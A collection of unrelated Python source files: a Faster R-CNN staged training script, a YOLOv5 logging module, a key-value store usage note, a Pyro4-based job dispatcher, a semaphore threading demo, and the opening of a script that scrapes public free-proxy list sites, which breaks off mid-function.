# stage is executed in a separate process using multiprocessing.Process.
# ------------------------------------------------------------------------------
def _init_caffe(cfg):
"""Initialize pycaffe in a training process.
"""
import caffe
# fix the random seeds (numpy and caffe) for reproducibility
np.random.seed(cfg.RNG_SEED)
caffe.set_random_seed(cfg.RNG_SEED)
# set up caffe
caffe.set_mode_gpu()
caffe.set_device(cfg.GPU_ID)
def train_rpn(queue=None, imdb_name=None, init_model=None, solver=None,
max_iters=None, cfg=None):
"""Train a Region Proposal Network in a separate training process.
"""
# Not using any proposals, just ground-truth boxes
cfg.TRAIN.HAS_RPN = True
cfg.TRAIN.BBOX_REG = False # applies only to Fast R-CNN bbox regression
cfg.TRAIN.PROPOSAL_METHOD = 'gt'
cfg.TRAIN.IMS_PER_BATCH = 1
print 'Init model: {}'.format(init_model)
print('Using config:')
pprint.pprint(cfg)
import caffe
_init_caffe(cfg)
roidb, imdb = get_roidb(imdb_name)
print 'roidb len: {}'.format(len(roidb))
output_dir = get_output_dir(imdb)
print 'Output will be saved to `{:s}`'.format(output_dir)
model_paths = train_net(solver, roidb, output_dir,
pretrained_model=init_model,
max_iters=max_iters)
# Cleanup all but the final model
for i in model_paths[:-1]:
os.remove(i)
rpn_model_path = model_paths[-1]
# Send final model path through the multiprocessing queue
queue.put({'model_path': rpn_model_path})
def rpn_generate(queue=None, imdb_name=None, rpn_model_path=None, cfg=None,
rpn_test_prototxt=None):
"""Use a trained RPN to generate proposals.
"""
cfg.TEST.RPN_PRE_NMS_TOP_N = -1 # no pre NMS filtering
cfg.TEST.RPN_POST_NMS_TOP_N = 2000 # limit top boxes after NMS
print 'RPN model: {}'.format(rpn_model_path)
print('Using config:')
pprint.pprint(cfg)
import caffe
_init_caffe(cfg)
# NOTE: the matlab implementation computes proposals on flipped images, too.
# We compute them on the image once and then flip the already computed
# proposals. This might cause a minor loss in mAP (less proposal jittering).
imdb = get_imdb(imdb_name)
print 'Loaded dataset `{:s}` for proposal generation'.format(imdb.name)
# Load RPN and configure output directory
rpn_net = caffe.Net(rpn_test_prototxt, rpn_model_path, caffe.TEST)
output_dir = get_output_dir(imdb)
print 'Output will be saved to `{:s}`'.format(output_dir)
# Generate proposals on the imdb
rpn_proposals = imdb_proposals(rpn_net, imdb)
# Write proposals to disk and send the proposal file path through the
# multiprocessing queue
rpn_net_name = os.path.splitext(os.path.basename(rpn_model_path))[0]
rpn_proposals_path = os.path.join(
output_dir, rpn_net_name + '_proposals.pkl')
with open(rpn_proposals_path, 'wb') as f:
cPickle.dump(rpn_proposals, f, cPickle.HIGHEST_PROTOCOL)
print 'Wrote RPN proposals to {}'.format(rpn_proposals_path)
queue.put({'proposal_path': rpn_proposals_path})
def train_fast_rcnn(queue=None, imdb_name=None, init_model=None, solver=None,
max_iters=None, cfg=None, rpn_file=None):
"""Train a Fast R-CNN using proposals generated by an RPN.
"""
cfg.TRAIN.HAS_RPN = False # not generating prosals on-the-fly
cfg.TRAIN.PROPOSAL_METHOD = 'rpn' # use pre-computed RPN proposals instead
cfg.TRAIN.IMS_PER_BATCH = 2
print 'Init model: {}'.format(init_model)
print 'RPN proposals: {}'.format(rpn_file)
print('Using config:')
pprint.pprint(cfg)
import caffe
_init_caffe(cfg)
roidb, imdb = get_roidb(imdb_name, rpn_file=rpn_file)
output_dir = get_output_dir(imdb)
print 'Output will be saved to `{:s}`'.format(output_dir)
# Train Fast R-CNN
model_paths = train_net(solver, roidb, output_dir,
pretrained_model=init_model,
max_iters=max_iters)
# Cleanup all but the final model
for i in model_paths[:-1]:
os.remove(i)
fast_rcnn_model_path = model_paths[-1]
# Send Fast R-CNN model path over the multiprocessing queue
queue.put({'model_path': fast_rcnn_model_path})
if __name__ == '__main__':
args = parse_args()
print('Called with args:')
print(args)
if args.cfg_file is not None:
cfg_from_file(args.cfg_file)
if args.set_cfgs is not None:
cfg_from_list(args.set_cfgs)
cfg.GPU_ID = args.gpu_id
# --------------------------------------------------------------------------
# Pycaffe doesn't reliably free GPU memory when instantiated nets are
# discarded (e.g. "del net" in Python code). To work around this issue, each
# training stage is executed in a separate process using
# multiprocessing.Process.
# --------------------------------------------------------------------------
# queue for communicated results between processes
mp_queue = mp.Queue()
# solves, iters, etc. for each training stage
solvers, max_iters, rpn_test_prototxt = get_solvers(args.net_name)
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print 'Stage 1 RPN, init from ImageNet model'
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
cfg.TRAIN.SNAPSHOT_INFIX = 'stage1'
mp_kwargs = dict(
queue=mp_queue,
imdb_name=args.imdb_name,
init_model=args.pretrained_model,
solver=solvers[0],
max_iters=max_iters[0],
cfg=cfg)
#p = mp.Process(target=train_rpn, kwargs=mp_kwargs)
#p.start()
#rpn_stage1_out = mp_queue.get()
#p.join()
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print 'Stage 1 RPN, generate proposals'
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
#mp_kwargs = dict(
# queue=mp_queue,
# imdb_name=args.imdb_name,
# rpn_model_path=str(rpn_stage1_out['model_path']),
# cfg=cfg,
# rpn_test_prototxt=rpn_test_prototxt)
#p = mp.Process(target=rpn_generate, kwargs=mp_kwargs)
#p.start()
rpn_stage1_out = {}
rpn_stage1_out['proposal_path'] = 'output/default/train/vgg_cnn_m_1024_rpn_stage1_iter_40000_proposals.pkl'#mp_queue.get()['proposal_path']
#p.join()
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print 'Stage 1 Fast R-CNN using RPN proposals, init from ImageNet model'
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
cfg.TRAIN.SNAPSHOT_INFIX = 'stage1'
#mp_kwargs = dict(
# queue=mp_queue,
# imdb_name=args.imdb_name,
# init_model=args.pretrained_model,
# solver=solvers[1],
# max_iters=max_iters[1],
# cfg=cfg,
# rpn_file=rpn_stage1_out['proposal_path'])
#p = mp.Process(target=train_fast_rcnn, kwargs=mp_kwargs)
#p.start()
#fast_rcnn_stage1_out = mp_queue.get()
#p.join()
#print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
#print 'Stage 2 RPN, init from stage 1 Fast R-CNN model'
#print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
#cfg.TRAIN.SNAPSHOT_INFIX = 'stage2'
#mp_kwargs = dict(
# queue=mp_queue,
# imdb_name=args.imdb_name,
# init_model=str(fast_rcnn_stage1_out['model_path']),
# solver=solvers[2],
# max_iters=max_iters[2],
# cfg=cfg)
#p = mp.Process(target=train_rpn, kwargs=mp_kwargs)
#p.start()
#rpn_stage2_out = mp_queue.get()
#p.join()
#print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
#print 'Stage 2 RPN, generate proposals'
#print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
#mp_kwargs = dict(
# queue=mp_queue,
# imdb_name=args.imdb_name,
# rpn_model_path=str(rpn_stage2_out['model_path']),
# cfg=cfg,
# rpn_test_prototxt=rpn_test_prototxt)
#p = mp.Process(target=rpn_generate, kwargs=mp_kwargs)
#p.start()
rpn_stage2_out = {}
rpn_stage2_out['proposal_path'] = 'output/default/train/vgg_cnn_m_1024_rpn_stage1_iter_40000_proposals.pkl'#mp_queue.get()['proposal_path']
rpn_stage2_out['model_path'] = 'output/default/train/vgg_cnn_m_1024_rpn_stage1_iter_40000.caffemodel'
#p.join()
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print 'Stage 2 Fast R-CNN, init from stage 2 RPN R-CNN model'
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
cfg.TRAIN.SNAPSHOT_INFIX = 'stage2'
mp_kwargs = dict(
queue=mp_queue,
imdb_name=args.imdb_name,
init_model=str(rpn_stage2_out['model_path']),
solver=solvers[3],
max_iters=max_iters[3],
cfg=cfg,
rpn_file=rpn_stage2_out['proposal_path'])
p = mp.Process(target=train_fast_rcnn, kwargs=mp_kwargs)
p.start()
fast_rcnn_stage2_out = mp_queue.get()
p.join()
# Create final model (just a copy of the last stage)
final_path = args.final_path
print 'cp {} -> {}'.format(
fast_rcnn_stage2_out['model_path'], final_path)
shutil.copy(fast_rcnn_stage2_out['model_path'], final_path)
print 'Final model: {}'.format(final_path)
|
__init__.py | # YOLOv5 🚀 by Ultralytics, GPL-3.0 license
"""
Logging utils
"""
import os
import warnings
from threading import Thread
import pkg_resources as pkg
import torch
from torch.utils.tensorboard import SummaryWriter
from yolov5_master.utils.general import colorstr, emojis
from yolov5_master.utils.loggers.wandb.wandb_utils import WandbLogger
from yolov5_master.utils.plots import plot_images, plot_results
from yolov5_master.utils.torch_utils import de_parallel
LOGGERS = ('csv', 'tb', 'wandb') # text-file, TensorBoard, Weights & Biases
RANK = int(os.getenv('RANK', -1))
try:
import wandb
assert hasattr(wandb, '__version__') # verify package import not local dir
if pkg.parse_version(wandb.__version__) >= pkg.parse_version('0.12.2') and RANK in [0, -1]:
try:
wandb_login_success = wandb.login(timeout=30)
except wandb.errors.UsageError: # known non-TTY terminal issue
wandb_login_success = False
if not wandb_login_success:
wandb = None
except (ImportError, AssertionError):
wandb = None
class Loggers():
# YOLOv5 Loggers class
def __init__(self, save_dir=None, weights=None, opt=None, hyp=None, logger=None, include=LOGGERS):
self.save_dir = save_dir
self.weights = weights
self.opt = opt
self.hyp = hyp
self.logger = logger # for printing results to console
self.include = include
self.keys = ['train/box_loss', 'train/obj_loss', 'train/cls_loss', # train loss
'metrics/precision', 'metrics/recall', 'metrics/mAP_0.5', 'metrics/mAP_0.5:0.95', # metrics
'val/box_loss', 'val/obj_loss', 'val/cls_loss', # val loss
'x/lr0', 'x/lr1', 'x/lr2'] # params
self.best_keys = ['best/epoch', 'best/precision', 'best/recall', 'best/mAP_0.5', 'best/mAP_0.5:0.95',]
for k in LOGGERS:
setattr(self, k, None) # init empty logger dictionary
self.csv = True # always log to csv
# Message
if not wandb:
prefix = colorstr('Weights & Biases: ')
s = f"{prefix}run 'pip install wandb' to automatically track and visualize YOLOv5 🚀 runs (RECOMMENDED)"
print(emojis(s))
# TensorBoard
s = self.save_dir
if 'tb' in self.include and not self.opt.evolve:
prefix = colorstr('TensorBoard: ')
self.logger.info(f"{prefix}Start with 'tensorboard --logdir {s.parent}', view at http://localhost:6006/")
self.tb = SummaryWriter(str(s))
# W&B
if wandb and 'wandb' in self.include:
wandb_artifact_resume = isinstance(self.opt.resume, str) and self.opt.resume.startswith('wandb-artifact://')
run_id = torch.load(self.weights).get('wandb_id') if self.opt.resume and not wandb_artifact_resume else None
self.opt.hyp = self.hyp # add hyperparameters
self.wandb = WandbLogger(self.opt, run_id)
else:
self.wandb = None
def on_pretrain_routine_end(self):
# Callback runs on pre-train routine end
paths = self.save_dir.glob('*labels*.jpg') # training labels
if self.wandb:
self.wandb.log({"Labels": [wandb.Image(str(x), caption=x.name) for x in paths]})
def on_train_batch_end(self, ni, model, imgs, targets, paths, plots, sync_bn):
# Callback runs on train batch end
if plots:
if ni == 0:
if not sync_bn: # tb.add_graph() --sync known issue https://github.com/ultralytics/yolov5/issues/3754
with warnings.catch_warnings():
warnings.simplefilter('ignore') # suppress jit trace warning
self.tb.add_graph(torch.jit.trace(de_parallel(model), imgs[0:1], strict=False), [])
if ni < 3:
f = self.save_dir / f'train_batch{ni}.jpg' # filename
Thread(target=plot_images, args=(imgs, targets, paths, f), daemon=True).start()
if self.wandb and ni == 10:
files = sorted(self.save_dir.glob('train*.jpg'))
self.wandb.log({'Mosaics': [wandb.Image(str(f), caption=f.name) for f in files if f.exists()]})
def on_train_epoch_end(self, epoch):
# Callback runs on train epoch end
if self.wandb:
self.wandb.current_epoch = epoch + 1
def on_val_image_end(self, pred, predn, path, names, im):
# Callback runs on val image end
if self.wandb:
self.wandb.val_one_image(pred, predn, path, names, im)
def on_val_end(self):
# Callback runs on val end
if self.wandb:
files = sorted(self.save_dir.glob('val*.jpg'))
self.wandb.log({"Validation": [wandb.Image(str(f), caption=f.name) for f in files]})
def on_fit_epoch_end(self, vals, epoch, best_fitness, fi):
# Callback runs at the end of each fit (train+val) epoch
x = {k: v for k, v in zip(self.keys, vals)} # dict
if self.csv:
file = self.save_dir / 'results.csv'
n = len(x) + 1 # number of cols
s = '' if file.exists() else (('%20s,' * n % tuple(['epoch'] + self.keys)).rstrip(',') + '\n') # add header
with open(file, 'a') as f:
f.write(s + ('%20.5g,' * n % tuple([epoch] + vals)).rstrip(',') + '\n')
if self.tb:
for k, v in x.items():
self.tb.add_scalar(k, v, epoch)
if self.wandb:
if best_fitness == fi:
best_results = [epoch] + vals[3:7]
for i, name in enumerate(self.best_keys):
self.wandb.wandb_run.summary[name] = best_results[i] # log best results in the summary
self.wandb.log(x)
self.wandb.end_epoch(best_result=best_fitness == fi)
def on_model_save(self, last, epoch, final_epoch, best_fitness, fi):
# Callback runs on model save event
if self.wandb:
if ((epoch + 1) % self.opt.save_period == 0 and not final_epoch) and self.opt.save_period != -1:
self.wandb.log_model(last.parent, self.opt, epoch, fi, best_model=best_fitness == fi)
def on_train_end(self, last, best, plots, epoch, results):
# Callback runs on training end
if plots:
plot_results(file=self.save_dir / 'results.csv') # save results.png
files = ['results.png', 'confusion_matrix.png', *(f'{x}_curve.png' for x in ('F1', 'PR', 'P', 'R'))]
files = [(self.save_dir / f) for f in files if (self.save_dir / f).exists()] # filter
if self.tb:
import cv2
for f in files:
self.tb.add_image(f.stem, cv2.imread(str(f))[..., ::-1], epoch, dataformats='HWC')
if self.wandb:
self.wandb.log({k: v for k, v in zip(self.keys[3:10], results)}) # log best.pt val results
self.wandb.log({"Results": [wandb.Image(str(f), caption=f.name) for f in files]})
# Calling wandb.log. TODO: Refactor this into WandbLogger.log_model
if not self.opt.evolve:
wandb.log_artifact(str(best if best.exists() else last), type='model',
name='run_' + self.wandb.wandb_run.id + '_model',
aliases=['latest', 'best', 'stripped'])
self.wandb.finish_run()
def on_params_update(self, params):
# Update hyperparams or configs of the experiment
# params: A dict containing {param: value} pairs
if self.wandb:
self.wandb.wandb_run.config.update(params, allow_val_change=True)
|
howit.py | #here are the commands to demonstrate how to access and perform operations on a main file
#run the MODULE of MAIN FILE and import mainfile as a library
import code as x
#importing the main file("code" is the name of the file I have used) as a library
x.create("sastra",25)
#to create a key with key_name,value given and with no time-to-live property
x.create("src",70,3600)
#to create a key with key_name,value given and with time-to-live property value given(number of seconds)
x.read("sastra")
#it returns the value of the respective key in Jasonobject format 'key_name:value'
x.read("src")
#it returns the value of the respective key in Jasonobject format if the TIME-TO-LIVE IS NOT EXPIRED else it returns an ERROR
x.create("sastra",50)
#it returns an ERROR since the key_name already exists in the database
#To overcome this error
#either use modify operation to change the value of a key
#or use delete operation and recreate it
x.modify("sastra",55)
#it replaces the initial value of the respective key with new value
x.delete("sastra")
#it deletes the respective key and its value from the database(memory is also freed)
#we can access these using multiple threads like
t1=Thread(target=(create or read or delete),args=(key_name,value,timeout)) #as per the operation
t1.start()
t1.sleep()
t2=Thread(target=(create or read or delete),args=(key_name,value,timeout)) #as per the operation
t2.start()
t2.sleep()
#and so on upto tn
#the code also returns other errors like
#"invalidkey" if key_length is greater than 32 or key_name contains any numeric,special characters etc.,
#"key doesnot exist" if key_name was mis-spelt or deleted earlier
#"File memory limit reached" if file memory exceeds 1GB
|
dispatcher.py | # This file is adapted from github repo: https://github.com/automl/HpBandSter.
import time
import Pyro4
import queue
import logging
import threading
class Job(object):
def __init__(self, id, **kwargs):
self.id = id
self.kwargs = kwargs
self.timestamps = dict()
self.result = None
self.exception = None
self.worker_name = None
def time_it(self, which_time):
self.timestamps[which_time] = time.time()
def __repr__(self):
repr_string = "job_id: " + str(self.id) + "\n" + "kwargs: " + str(self.kwargs) + "\n" + "result: " + \
str(self.result) + "\n" + "exception: " + str(self.exception) + "\n"
return repr_string
class Worker(object):
def __init__(self, name, uri):
self.name = name
self.proxy = Pyro4.Proxy(uri)
self.runs_job = None
def is_alive(self):
try:
self.proxy._pyroReconnect(1)
except Pyro4.errors.ConnectionClosedError:
return False
except:
raise
return True
def shutdown(self):
self.proxy.shutdown()
def is_busy(self):
return self.proxy.is_busy()
def __repr__(self):
return self.name
class Dispatcher(object):
"""
The dispatcher is responsible for assigning tasks to free workers, report results back to the master and
communicate to the nameserver.
"""
def __init__(self, new_result_callback, run_id='0', ping_interval=10, nameserver='localhost', nameserver_port=None,
host=None, logger=None, queue_callback=None):
"""
Parameters
----------
new_result_callback: function
function that will be called with a `Job instance <hpbandster.core.dispatcher.Job>`_ as argument.
From the `Job` the result can be read and e.g. logged.
run_id: str
unique run_id associated with the HPB run
ping_interval: int
how often to ping for workers (in seconds)
nameserver: str
address of the Pyro4 nameserver
nameserver_port: int
port of Pyro4 nameserver
host: str
ip (or name that resolves to that) of the network interface to use
logger: logging.Logger
logger-instance for info and debug
queue_callback: function
gets called with the number of workers in the pool on every update-cycle
"""
self.new_result_callback = new_result_callback
self.queue_callback = queue_callback
self.run_id = run_id
self.nameserver = nameserver
self.nameserver_port = nameserver_port
self.host = host
self.ping_interval = int(ping_interval)
self.shutdown_all_threads = False
if logger is None:
self.logger = logging.getLogger('[Lite-BO] dispatcher')
else:
self.logger = logger
self.logger.setLevel(logging.DEBUG)
self.worker_pool = {}
self.waiting_jobs = queue.Queue()
self.running_jobs = {}
self.history_jobs = list()
self.idle_workers = set()
self.thread_lock = threading.Lock()
self.runner_cond = threading.Condition(self.thread_lock)
self.discover_cond = threading.Condition(self.thread_lock)
self.pyro_id = "litebo.run_%s.dispatcher" % self.run_id
def run(self):
with self.discover_cond:
t1 = threading.Thread(target=self.discover_workers, name='discover_workers')
t1.start()
self.logger.info('DISPATCHER: started the \'discover_worker\' thread')
t2 = threading.Thread(target=self.job_runner, name='job_runner')
t2.start()
self.logger.info('DISPATCHER: started the \'job_runner\' thread')
self.pyro_daemon = Pyro4.core.Daemon(host=self.host)
with Pyro4.locateNS(host=self.nameserver, port=self.nameserver_port) as ns:
uri = self.pyro_daemon.register(self, self.pyro_id)
ns.register(self.pyro_id, uri)
self.logger.info("DISPATCHER: Pyro daemon running on %s" % self.pyro_daemon.locationStr)
self.pyro_daemon.requestLoop()
with self.discover_cond:
self.shutdown_all_threads = True
self.logger.info('DISPATCHER: Dispatcher shutting down')
self.runner_cond.notify_all()
self.discover_cond.notify_all()
with Pyro4.locateNS(host=self.nameserver, port=self.nameserver_port) as ns:
ns.remove(self.pyro_id)
t1.join()
self.logger.debug('DISPATCHER: \'discover_worker\' thread exited')
t2.join()
self.logger.debug('DISPATCHER: \'job_runner\' thread exited')
self.logger.info('DISPATCHER: shut down complete')
def shutdown_all_workers(self, rediscover=False):
with self.discover_cond:
for worker in self.worker_pool.values():
worker.shutdown()
if rediscover:
time.sleep(1)
self.discover_cond.notify()
def shutdown(self, shutdown_workers=False):
if shutdown_workers:
self.shutdown_all_workers()
with self.runner_cond:
self.pyro_daemon.shutdown()
@Pyro4.expose
@Pyro4.oneway
def trigger_discover_worker(self):
self.logger.info("DISPATCHER: A new worker triggered discover_worker")
with self.discover_cond:
self.discover_cond.notify()
def discover_workers(self):
self.discover_cond.acquire()
sleep_interval = 1
while True:
self.logger.debug('DISPATCHER: Starting worker discovery**************************************************')
update = False
with Pyro4.locateNS(host=self.nameserver, port=self.nameserver_port) as ns:
worker_names = ns.list(prefix="lite-bo.run_%s.worker." % self.run_id)
self.logger.debug("DISPATCHER: Found %i potential workers, %i currently in the pool."%(len(worker_names), len(self.worker_pool)))
for wn, uri in worker_names.items():
if wn not in self.worker_pool:
w = Worker(wn, uri)
if not w.is_alive():
self.logger.debug('DISPATCHER: skipping dead worker, %s' % wn)
continue
update = True
self.logger.info('DISPATCHER: discovered new worker, %s' % wn)
self.worker_pool[wn] = w
# check the current list of workers
crashed_jobs = set()
all_workers = list(self.worker_pool.keys())
for wn in all_workers:
# remove dead entries from the nameserver
if not self.worker_pool[wn].is_alive():
self.logger.info('DISPATCHER: removing dead worker, %s' % wn)
update = True
# todo check if there were jobs running on that that need to be rescheduled
current_job = self.worker_pool[wn].runs_job
if not current_job is None:
self.logger.info('Job %s was not completed' % str(current_job))
crashed_jobs.add(current_job)
del self.worker_pool[wn]
self.idle_workers.discard(wn)
continue
if not self.worker_pool[wn].is_busy():
self.idle_workers.add(wn)
# try to submit more jobs if something changed
if update:
if not self.queue_callback is None:
self.discover_cond.release()
self.queue_callback(len(self.worker_pool))
self.discover_cond.acquire()
self.runner_cond.notify()
for crashed_job in crashed_jobs:
self.discover_cond.release()
self.register_result(crashed_job, {'result': None, 'exception': 'Worker died unexpectedly.'})
self.discover_cond.acquire()
self.logger.debug('DISPATCHER: Finished worker discovery')
self.discover_cond.wait(self.ping_interval)
if self.shutdown_all_threads:
self.logger.debug('DISPATCHER: discover_workers shutting down')
self.runner_cond.notify()
self.discover_cond.release()
return
def number_of_workers(self):
with self.discover_cond:
return len(self.worker_pool)
def job_runner(self):
self.runner_cond.acquire()
while True:
while self.waiting_jobs.empty() or len(self.idle_workers) == 0:
self.logger.debug('DISPATCHER: jobs to submit = %i, number of idle workers = %i -> waiting!'%(self.waiting_jobs.qsize(), len(self.idle_workers) ))
self.runner_cond.wait()
self.logger.debug('DISPATCHER: Trying to submit another job.')
if self.shutdown_all_threads:
self.logger.debug('DISPATCHER: job_runner shutting down')
self.discover_cond.notify()
self.runner_cond.release()
return
job = self.waiting_jobs.get()
wn = self.idle_workers.pop()
worker = self.worker_pool[wn]
self.logger.info('DISPATCHER: starting job %s on %s' % (str(job.id), worker.name))
job.time_it('started')
worker.runs_job = job.id
worker.proxy.start_computation(self, job.id, **job.kwargs)
job.worker_name = wn
self.running_jobs[job.id] = job
self.logger.info('DISPATCHER: job %s dispatched on %s' % (str(job.id), worker.name))
def submit_job(self, id, **kwargs):
self.logger.info('DISPATCHER: trying to submit job %s' % str(id))
with self.runner_cond:
job = Job(id, **kwargs)
job.time_it('submitted')
self.waiting_jobs.put(job)
self.logger.info('DISPATCHER: trying to notify the job_runner thread.')
self.runner_cond.notify()
@Pyro4.expose
@Pyro4.callback
@Pyro4.oneway
def register_result(self, id=None, result=None):
self.logger.debug('DISPATCHER: job %s finished'%(str(id)))
with self.runner_cond:
self.logger.debug('DISPATCHER: register_result: lock acquired')
# fill in missing information
job = self.running_jobs[id]
job.time_it('finished')
job.result = result['result']
job.exception = result['exception']
self.logger.debug('DISPATCHER: job %s on %s finished' % (str(job.id), job.worker_name))
self.logger.debug(str(job))
# delete job
del self.running_jobs[id]
self.history_jobs.append(job)
# label worker as idle again
try:
self.worker_pool[job.worker_name].runs_job = None
self.worker_pool[job.worker_name].proxy._pyroRelease()
self.idle_workers.add(job.worker_name)
# notify the job_runner to check for more jobs to run
self.runner_cond.notify()
except KeyError:
# happens for crashed workers, but we can just continue
pass
except:
raise
# call users callback function to register the result
# needs to be with the condition released, as the master can call
# submit_job quickly enough to cause a dead-lock
self.new_result_callback(job)
|
sem.py | #! /usr/bin/env python
# -*- coding:UTF-8 -*-
# 使用信号量机制,注意semaphore的使用
# sem可以管理某一类资源的一组实例
# 其实使用queue队列模块是最佳的
import threading
import time
import random
def numbergen(sem, queue, qlock):
while True:
time.sleep(2)
if random.randint(0,1):
value = random.randint(1,100)
qlock.acquire() # 第二道岗,可以独占队列
try:
queue.append(value)
finally:
qlock.release()
print "Placed %d on the queue." % value
sem.release() #第一道岗,表明对消费者来说数据已经可以使用了,数字不一定马上处理
def numbercal(sem, queue, qlock):
while True:
sem.acquire()
qlock.acquire()
try:
value = queue.pop(0)
finally:
qlock.release()
print "%s: Got %d from the queue."%\
(threading.currentThread().getName(),value)
newvalue = value * 2
time.sleep(3)
# 主线程,共享变量,参数传递
childthreads = []
sem = threading.Semaphore(0)
queue = []
qlock = threading.Lock()
# 创建生产线程
t = threading.Thread(target = numbergen, args = [sem, queue, qlock])
t.setDaemon(True)
t.start()
childthreads.append(t)
# 创建消费线程
for i in range(1,3):
t = threading.Thread(target = numbercal, args= [sem,queue, qlock])
t.setDaemon(True)
t.start()
childthreads.append(t)
while True: #forever
time.sleep(300)
|
proxy-scraper.py | ######################################################################
################ http://scrapeomatic.blogspot.com/ ###################
######################################################################
##################### Proxy Scraper Script V1.2 ######################
######################################################################
######################################################################
###################### http://proxy-list.org #########################
##################### http://www.us-proxy.org ########################
#################### http://free-proxy-list.net ######################
#################### http://www.cool-proxy.net #######################
####################### http://www.samair.ru #########################
#################### http://www.proxylisty.com #######################
######################## http://nntime.com ###########################
#################### http://www.aliveproxy.com #######################
######################################################################
import urllib, urllib2
import time, datetime
import threading, Queue
import re
import StringIO, gzip
import sys
######################################################################
############################ Settings ################################
######################################################################
debug = False
######################################################################
######################################################################
def bug(line):
if debug == True:
print "Debug:: " + line
def queueThread():
global proxyCount
ts = time.time()
dt = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d-%H-%M-%S')
print "Saving to proxylist-" + dt + ".txt"
fout = open("proxylist-" + dt + ".txt", "w")
while not workerQueue.empty():
fout.write(workerQueue.get() + "\n")
proxyCount+=1
fout.close()
def proxylist():
print "Grabbing: http://proxy-list.org/"
primary_url = "http://proxy-list.org/english/index.php?p="
urls = []
for i in range(1, 11):
urls.append(primary_url + str(i))
for url in urls:
try:
bug("grabbing " + "'" + url + "'")
opener = urllib2.build_opener()
opener.addheaders = [('Host', 'www.proxylisty.com'),
('Connection', 'keep-alive'),
('Cache-Control', 'max-age=0'),
('Accept','text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'),
('Upgrade-Insecure-Requests', '1'),
('User-agent', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36'),
('Referer', 'https://www.google.co.za/'),
('Accept-Encoding','gzip, deflate, sdch'),
('Accept-Language','en-US,en;q=0.8')]
response = opener.open(url, timeout=10)
compressedFile = StringIO.StringIO()
compressedFile.write(response.read())
compressedFile.seek(0)
decompessedFile = gzip.GzipFile(fileobj=compressedFile, mode='rb')
html = decompessedFile.read()
templs = re.findall(r'<li class="proxy">([1-99999].*)?</li>', html)
for line in templs:
workerQueue.put(line)
bug("proxylist() " + line)
except Exception, e:
if e.message == " ":
bug(e.message)
bug("Failed to grab " + "'" + url + "'")
else:
bug("Failed to grab " + "'" + url + "'")
def usproxy():
print "Grabbing: http://www.us-proxy.org/"
templs = []
url = "http://www.us-proxy.org/"
try:
bug("grabbing " + "'" + url + "'")
opener = urllib2.build_opener()
opener.addheaders = [('Host', 'www.proxylisty.com'),
('Connection', 'keep-alive'),
('Cache-Control', 'max-age=0'),
('Accept','text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'),
('Upgrade-Insecure-Requests', '1'),
('User-agent', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36'),
('Referer', 'https://www.google.co.za/'),
('Accept-Encoding','gzip, deflate, sdch'),
('Accept-Language','en-US,en;q=0.8')]
response = opener.open(url, timeout=10)
html = response.read()
templs = re.findall(r'<tr><td>(.*?)</td><td>', html)
templs2 = re.findall(r'</td><td>[1-99999].*?</td><td>', html)
for i in range(len(templs)):
temp = templs[i] + ":" + templs2[i].replace('</td><td>', '')
workerQueue.put(temp)
bug("usproxy() " + templs[i] + ":" + templs2[i].replace('</td><td>', ''))
except Exception, e:
if e.message == " ":
bug(e.message)
bug("Failed to grab " + "'" + url + "'")
else:
bug("Failed to grab " + "'" + url + "'")
def freeproxylist():
print "Grabbing: http://free-proxy-list.net/"
url = "http://free-proxy-list.net/"
try:
bug("grabbing " + "'" + url + "'")
opener = urllib2.build_opener()
opener.addheaders = [('Host', 'www.proxylisty.com'),
('Connection', 'keep-alive'),
('Cache-Control', 'max-age=0'),
('Accept','text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'),
('Upgrade-Insecure-Requests', '1'),
('User-agent', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36'),
('Referer', 'https://www.google.co.za/'),
('Accept-Encoding','gzip, deflate, sdch'),
('Accept-Language','en-US,en;q=0.8')]
response = opener.open(url, timeout=10)
html = response.read()
templs = re.findall(r'<tr><td>(.*?)</td><td>', html)
templs2 = re.findall(r'</td><td>[1-99999].*?</td><td>', html)
for i in range(len(templs)):
workerQueue.put(templs[i] + ":" + templs2[i].replace('</td><td>', ''))
bug("freeproxylist() " + templs[i] + ":" + templs2[i].replace('</td><td>', ''))
except Exception, e:
if e.message == " ":
bug(e.message)
bug("Failed to grab " + "'" + url + "'")
else:
bug("Failed to grab " + "'" + url + "'")
def coolproxy():
print "Grabbing: http://www.cool-proxy.net/"
primary_url = "http://www.cool-proxy.net/proxies/http_proxy_list/sort:score/direction:desc/page:"
urls = []
for i in range(1, 13):
urls.append(primary_url + str(i))
for url in urls:
bug("grabbing " + "'" + url + "'")
try:
opener = urllib2.build_opener()
